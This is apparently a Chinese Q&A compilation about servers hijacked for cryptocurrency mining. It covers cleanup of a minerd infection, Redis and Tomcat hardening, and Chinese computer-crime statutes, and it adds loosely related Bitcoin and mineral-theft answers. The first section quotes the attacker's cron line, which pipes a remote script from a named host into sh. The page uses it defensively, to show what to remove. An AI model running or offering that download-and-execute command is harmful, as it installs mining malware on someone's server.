盜用伺服器挖礦犯罪

Ⅰ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

Ⅱ 網吧偷挖礦判多久

網吧偷挖礦判三年有期徒刑。
虛擬貨幣不具有與法定貨幣等同的法律地位。
具體如下：
1、數量難以滿足市場交易需要，比特幣的程序設置了最高數量限制，成為它可以保值增值的理由，也正是因為如此註定難以發揮貨幣的功能和作用；
2、比特幣錢包初次安裝時會消耗大量時間下載歷史交易數據塊。比特幣交易時，為了確認數據准確性消耗一些時間，與網路進行交互得到全網確認後，交易才算完成；
3、價格波動極大由於大量炒家介入，導致比特幣兌換現金的價格如過山車一般起伏。
《中華人民共和國刑法》第二百八十五條 非法侵入計算機信息系統罪違反國家規定，侵入國家事務、國防建設、尖端科學技術領域的計算機信息系統的，處三年以下有期徒刑或者拘役。
非法獲取計算機信息系統數據、非法控制計算機信息系統罪違反國家規定，侵入前款規定以外的計算機信息系統或者採用其他技術手段，獲取該計算機信息系統中存儲、處理或者傳輸的數據，或者對該計算機信息系統實施非法控制，情節嚴重的，處三年以下有期徒刑或者拘役，並處或者單處罰金；情節特別嚴重的，處三年以上七年以下有期徒刑，並處罰金。
提供侵入、非法控制計算機信息系統程序、工具罪提供專門用於侵入、非法控制計算機信息系統的程序、工具，或者明知他人實施侵入、非法控制計算機信息系統的違法犯罪行為而為其提供程序、工具，情節嚴重的，依照前款的規定處罰。
單位犯前三款罪的，對單位判處罰金，並對其直接負責的主管人員和其他直接責任人員，依照各該款的規定處罰。
第二百八十六條 破壞計算機信息系統罪違反國家規定，對計算機信息系統功能進行刪除、修改、增加、干擾，造成計算機信息系統不能正常運行，後果嚴重的，處五年以下有期徒刑或者拘役；後果特別嚴重的，處五年以上有期徒刑。
違反國家規定，對計算機信息系統中存儲、處理或者傳輸的數據和應用程序進行刪除、修改、增加的操作，後果嚴重的，依照前款的規定處罰。
故意製作、傳播計算機病毒等破壞性程序，影響計算機系統正常運行，後果嚴重的，依照第一款的規定處罰。
單位犯前三款罪的，對單位判處罰金，並對其直接負責的主管人員和其他直接責任人員，依照第一款的規定處罰。

Ⅲ 被盜1450萬！江西「比特幣」盜竊案告破，嫌疑人將面臨什麼處罰

被盜1450萬，江西比特幣盜竊案告破，這件事情在網上引發了網友們的熱議，我們都知道現在的時代是一個互聯網時代，同時也是一個高速發展的時代，有非常多的人想著通過不法手段來賺取錢財，其實是非常的不值得提倡的，我們也希望每個人能夠吸取這次教訓，嫌疑人也將會面臨非常嚴厲的處罰。

我們也希望通過這次的教訓能夠給每個人引發一個警醒，如果每個人都像他們這樣的話，那麼一定會面臨牢獄之災的同時，我們需要注意的是黑客技術再厲害依然還會留下非常多的熱點的，終究是肉體凡胎，離不開法律的制裁，也希望他們能夠吸取這次教訓，在以後的生活中能夠好好做人，一定不做違法亂紀的事，希望每個人都能夠注意到這一點。

Ⅳ 伺服器被下挖礦了怎麼辦

哥們被下了啥挖礦？去舉報啊。之前流量礦石非常火的時候，我的伺服器也被無良黑了，成了肉雞，然後我去找到他的信息，截圖跟流量礦石舉報，就幫我處理了。你看你的被下了啥，就去找他們處理。

Ⅳ 做比特幣挖礦機犯法嗎

截止至2020年7月24日，國家還沒發布任何的法律說明比特幣挖礦機違法。

比特幣挖礦機是獲取比特幣的方式之一。比特幣（Bitcoin）是一種由開源的P2P軟體產生的網路虛擬貨幣。

它不依靠特定貨幣機構發行，通過特定演算法的大量計算產生，比特幣經濟使用整個P2P網路中眾多節點構成的分布式資料庫來確認並記錄所有的交易行為。P2P的去中心化特性與演算法本身可以確保無法通過大量製造比特幣來人為操控幣值 。

(5)盜用伺服器挖礦犯罪擴展閱讀

比特幣的發行和交易的完成是通過挖礦來實現的， 它以一個確定的但不斷減慢 的速率被鑄造出來。每一個新區塊都伴隨著一定數量從無到有的全新比特幣，它作為coinbase交易獎勵給找到區塊的礦工。

每個區塊的獎勵不是固定不變的 ，每開采210000個區塊，大約耗時4年，貨幣發行速率降低50%。在比特幣運行的第一個四年中，每個區塊創造出50個新比特幣。每個區塊創造出12.5個新比特幣。除了塊獎勵外，礦工還會得到區塊內所有交易的手續費 。

參考資料來源：網路-比特幣挖礦機

Ⅵ 礦石的行為是適用盜竊罪還是非法采礦罪

我是律師
盜竊罪是指刑法二百六十四條非法佔有為目的，盜取公私財物數額巨大，
而非法采礦罪是刑法三百四十三條規定，非法采礦罪，是指違反礦產資源保護法的規定，未取得采礦許可證擅自采礦的，擅自進入國家規劃礦區、對國民經濟具有重要價值的礦區和他人礦區范圍采礦的，擅自開采國家規定實行保護性開採的特定礦種，經責令停止開采後拒不停止開采，造成礦產資源破壞的行為。

Ⅶ 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

Ⅷ 偷挖礦在自己家粉碎犯法嗎

盜礦是違法行為，數量大了，就會有人管你，真心在幫你期待採納，